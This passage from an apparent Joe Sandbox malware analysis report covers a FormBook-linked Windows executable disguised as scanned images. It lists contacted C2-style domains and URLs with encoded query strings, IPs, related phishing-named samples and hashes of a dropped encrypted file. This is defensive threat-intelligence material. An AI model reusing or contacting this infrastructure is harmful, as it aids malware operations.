            http://www.zhuan-tou.com/pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_80%Avira URL Cloudsafe
            http://www.synergon.space/8unq/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kmdne.ajunsdfancsda.com
            		216.83.33.145
            		truetrue
              		unknown
              stemfiniti.com
              		3.33.130.190
              		truetrue
                		unknown
                www.lfghtko.lol
                		116.213.43.190
                		truetrue
                  		unknown
                  8xbe578.app
                  		3.33.130.190
                  		truetrue
                    		unknown
                    alanbeanart.com
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.mqmsqkw.lol
                      		116.213.43.190
                      		truetrue
                        		unknown
                        www.zhuan-tou.com
                        		38.12.1.29
                        		truetrue
                          		unknown
                          rtrpodcast.online
                          		76.223.67.189
                          		truetrue
                            		unknown
                            www.tqfabxah.com
                            		35.241.42.217
                            		truefalse
                              		unknown
                              www.lecoinsa.net
                              		217.116.0.191
                              		truetrue
                                		unknown
                                synergon.space
                                		109.95.158.127
                                		truetrue
                                  		unknown
                                  www.slushcafe.top
                                  		203.161.55.102
                                  		truetrue
                                    		unknown
                                    www.kacotae.com
                                    		64.226.69.42
                                    		truetrue
                                      		unknown
                                      www.alanbeanart.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.stemfiniti.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          56.126.166.20.in-addr.arpa
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.a9jcpf.top
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.winkthree.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.rtrpodcast.online
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.synergon.space
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.8xbe578.app
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.alanbeanart.com/7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.slushcafe.top/irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mqmsqkw.lol/jda9/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.8xbe578.app/1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.alanbeanart.com/7ie4/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.lfghtko.lol/yxos/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtrpodcast.online/l2ei/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.synergon.space/8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.lecoinsa.net/7ffx/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.stemfiniti.com/toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.slushcafe.top/irn0/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zhuan-tou.com/pjmu/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.a9jcpf.top/mpex/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.lfghtko.lol/yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kacotae.com/rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tqfabxah.com/zjwj/false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.kacotae.com/rdfm/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.8xbe578.app/1nsp/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zhuan-tou.com/pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.synergon.space/8unq/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mqmsqkw.lol/jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabschtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkschtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsschtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsschtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoschtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://track.uc.cn/collectschtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://dhosting.pl/bledyhttp/domeny.htmlschtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.lfghtko.lolXraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsschtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://dhosting.pl/img/logo.svgschtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dhosting.pl/kontaktXraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://hm.baidu.com/hm.js?schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchschtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://dhosting.plXraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dhosting.pl/bledyhttp/hosting.htmlschtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsschtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrXraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000036E8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssschtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      35.241.42.217
                                                      		www.tqfabxah.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      217.116.0.191
                                                      		www.lecoinsa.netSpain
                                                      		16371ACENS_ASSpainHostinghousingandVPNservicesEStrue
                                                      76.223.67.189
                                                      		rtrpodcast.onlineUnited States
                                                      		16509AMAZON-02UStrue
                                                      203.161.55.102
                                                      		www.slushcafe.topMalaysia
                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                      216.83.33.145
                                                      		kmdne.ajunsdfancsda.comUnited States
                                                      		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                      38.12.1.29
                                                      		www.zhuan-tou.comUnited States
                                                      		174COGENT-174UStrue
                                                      64.226.69.42
                                                      		www.kacotae.comCanada
                                                      		13768COGECO-PEER1CAtrue
                                                      109.95.158.127
                                                      		synergon.spacePoland
                                                      		48896DHOSTING-ASWarsawPolandPLtrue
                                                      3.33.130.190
                                                      		stemfiniti.comUnited States
                                                      		8987AMAZONEXPANSIONGBtrue
                                                      116.213.43.190
                                                      		www.lfghtko.lolHong Kong
                                                      		63889CLOUDIVLIMITED-ASCloudIvLimitedHKtrue

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1494558
                                                      Start date and time:2024-08-18 18:23:06 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 10m 22s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@15/10
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 51
                                                      • Number of non-executed functions: 281
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target XraVxjqYYo.exe, PID 4756 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • VT rate limit hit for: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      12:25:03API Interceptor9759248x Sleep call for process: schtasks.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      217.116.0.191Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/7ffx/
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/i4bw/
                                                      Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/zd4t/
                                                      D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/7ffx/
                                                      REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/7ffx/
                                                      pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/xu8t/
                                                      RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/zd4t/
                                                      CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                      • www.lecoinsa.net/xu8t/
                                                      Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
                                                      fJXbhkbAh4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
                                                      76.223.67.189PO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.srripaspocon.org/5if5/
                                                      Botulismus56.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.osbornesargent.co.uk/md49/?Oh=QPM+w8Ig1ROzmMib5SDu6zuYSnXOkQr9m7samoBwdfEnV0n0l3uWLVJ7UGPwsRh8pmtmt+CAU5h/xYkYsyOGxbf0SN0yaP11Hv40L4ijSawEYWA0VnDvvTA=&sxilk=HBrl
                                                      Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • www.rtrpodcast.online/l2ei/
                                                      SecuriteInfo.com.Win32.RATX-gen.24742.674.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.stellardaysigning.com/xb5p/
                                                      mtTw7o41OC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.microsofr.fun/omnp/
                                                      Payrol list.exeGet hashmaliciousFormBookBrowse
                                                      • www.rtrpodcast.online/g3rq/
                                                      LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.magnauniversity.com/hfhf/?6lBX5p6=A/Xwur6vfkk1nt0HF5vI+iD3HQmsBnVKlXfi47Zpsj5D+hS3O7IepQPDfrVs1xyfsUFv&Kjsl=FbuD_t_HwtJdin
                                                      IIMG_00172424.exeGet hashmaliciousFormBookBrowse
                                                      • www.stellardaysigning.com/xb5p/
                                                      eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                      • mgsdaigou2.com/
                                                      gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                      • kensingtonconfectionery.com/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.mqmsqkw.lolScanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      Payrol list.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      New Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 116.213.43.190
                                                      BL.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      payment advice.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      new order.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      www.lfghtko.lolScanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      PTT request form.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      PTT quotation form.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      Required quotations data list.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.20907.8920.exeGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      HILCORP ENERGY REQUESTS.zipGet hashmaliciousFormBookBrowse
                                                      • 116.213.43.190
                                                      kmdne.ajunsdfancsda.comScanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • 216.83.33.140

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AMAZON-02USPO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 76.223.67.189
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 52.222.236.23
                                                      APS-0240226.exeGet hashmaliciousFormBookBrowse
                                                      • 18.183.3.45
                                                      http://vbfii.pgslotmx.com/4lErLl15833GMQN1411zilkbmrmpx14462UVBCFIXAXTJVAYQ286RNBY17492g17Get hashmaliciousUnknownBrowse
                                                      • 54.76.183.106
                                                      http://vztel.pgslotmx.com/4LzXXV15833BwEh1411pqqjcszogu14462TQIECUFXUJQCTZS286RSWC17492j17Get hashmaliciousUnknownBrowse
                                                      • 54.71.206.39
                                                      http://nxejt.polluxcastor.topGet hashmaliciousUnknownBrowse
                                                      • 18.244.18.32
                                                      DzgLfcsXop.exeGet hashmaliciousUnknownBrowse
                                                      • 3.165.136.99
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 52.222.236.48
                                                      SecuriteInfo.com.Win32.DropperX-gen.16703.29630.exeGet hashmaliciousLummaCBrowse
                                                      • 185.166.143.49
                                                      SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exeGet hashmaliciousStealcBrowse
                                                      • 185.166.143.50
                                                      ACENS_ASSpainHostinghousingandVPNservicesESScanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                                                      • 217.116.5.231
                                                      5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                                      • 82.194.91.200
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                      • 217.116.0.191
                                                      VNPT-AS-VNVNPTCorpVNVinyl Graphics Document.xlsxGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                      • 203.161.38.167
                                                      Vinyl Graphics Document.xlsxGet hashmaliciousUnknownBrowse
                                                      • 203.161.38.167
                                                      Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 203.161.49.193
                                                      qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.49.193
                                                      Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 203.161.46.205
                                                      Payment Advice - Advice Ref[BIBBC2023189].exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 203.161.46.205
                                                      SecuriteInfo.com.Win32.MalwareX-gen.27733.18864.exeGet hashmaliciousUnknownBrowse
                                                      • 103.255.237.239
                                                      DHL 0009485777.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 203.161.42.161
                                                      Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.42.158
                                                      Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.41.190

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\Mazatl

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):271872
                                                      Entropy (8bit):7.993386307633134
                                                      Encrypted:true
                                                      SSDEEP:6144:velP3FogzISzT+rzY+eHZWnk62FfP5zatkFy1vDJ:Gl/ygkSQeW+ZP5uvd
                                                      MD5:E2ABE3AF2B1EFA391F592E0DB4914937
                                                      SHA1:EA3CC692BF07DBFE764F074BEF9B2CA0D944EE85
                                                      SHA-256:5AE2213AB114B3942CA41ACE0DE1518F9937165D293CE0B5E5960A59CF9ECFB8
                                                      SHA-512:B598EB4E0B41C465972A70CAD5444EE7E686B34205519B78E619FE3532F91CC5C4B89C8B3D4C2A2F5D5F730371D83F52D0F376E49294A8967CC955B87AA21263
                                                      Malicious:false
                                                      Reputation:low
